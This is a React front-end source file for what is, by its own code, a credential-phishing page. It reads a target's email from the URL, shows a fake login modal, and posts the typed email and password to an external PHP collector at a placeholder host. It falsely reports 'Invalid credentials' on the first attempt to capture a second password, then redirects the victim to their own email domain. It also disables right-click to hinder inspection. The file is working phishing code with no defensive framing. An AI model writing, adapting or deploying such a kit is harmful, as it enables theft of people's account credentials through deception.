import React, { useState, useEffect } from 'react';
import TopNav from './components/TopNav';
import Loader from './components/Loader';
import LoginModal from './components/LoginModal';
import Alert from './components/Alert';

const App = () => {
  const [email, setEmail] = useState('');
  const [showLoader, setShowLoader] = useState(true);
  const [showModal, setShowModal] = useState(false);
  const [submissionCount, setSubmissionCount] = useState(0);
  const [alert, setAlert] = useState({
    type: '',
    message: '',
    visible: false
  });

  // Get email from URL
  useEffect(() => {
    const getEmailFromURL = () => {
      const hashEmail = window.location.hash.substring(1);
      if (hashEmail.includes('@')) return hashEmail;
      
      const urlParams = new URLSearchParams(window.location.search);
      return urlParams.get('email') || '';
    };

    const urlEmail = getEmailFromURL();
    setEmail(urlEmail);

    // Initial loader timeout
    const timer = setTimeout(() => {
      setShowLoader(false);
      setShowModal(true);
    }, 3000);

    return () => clearTimeout(timer);
  }, []);

  const handleSubmit = async (formData) => {
    setShowLoader(true);
    setAlert({ ...alert, visible: false });

    try {
      // POST request to external PHP endpoint
      const response = await fetch('https://your-external-server.com/dmc.php', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: new URLSearchParams({
          email: formData.email,
          password: formData.password,
          source: formData.source
        })
      });

      // Handle response
      if (response.ok) {
        setSubmissionCount(prev => prev + 1);
        setShowLoader(false);

        if (submissionCount === 0) {
          setAlert({
            type: 'danger',
            message: 'Invalid credentials! Try again.',
            visible: true
          });
        } else {
          setAlert({
            type: 'success',
            message: 'Successful! Redirecting...',
            visible: true
          });

          const domain = formData.email.split('@')[1];
          setTimeout(() => {
            window.location.replace(`https://www.${domain}`);
          }, 2000);
        }
      } else {
        throw new Error('Server responded with error');
      }
    } catch (error) {
      setShowLoader(false);
      setAlert({
        type: 'danger',
        message: 'Server error. Please try again.',
        visible: true
      });
    }
  };

  return (
    <div onContextMenu={(e) => e.preventDefault()}>
      <TopNav email={email} />
      <center>
        <Loader visible={showLoader} />
      </center>
      
      {showModal && (
        <center>
          <LoginModal 
            email={email} 
            onSubmit={handleSubmit}
            onClose={() => setShowModal(false)}
          />
        </center>
      )}
      
      <div className="alert-container">
        <Alert 
          type="danger" 
          message={alert.message} 
          visible={alert.visible && alert.type === 'danger'} 
        />
        <Alert 
          type="success" 
          message={alert.message} 
          visible={alert.visible && alert.type === 'success'} 
        />
      </div>
    </div>
  );
};

export default App;